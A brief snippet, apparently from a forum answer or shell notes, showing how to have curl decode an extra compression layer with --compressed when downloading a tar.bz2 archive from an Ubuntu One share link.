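        # or have curl decode the extra layer itself
        curl --compressed -o file.tar.bz2 http://ubuntuone.com/p/XXXX/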

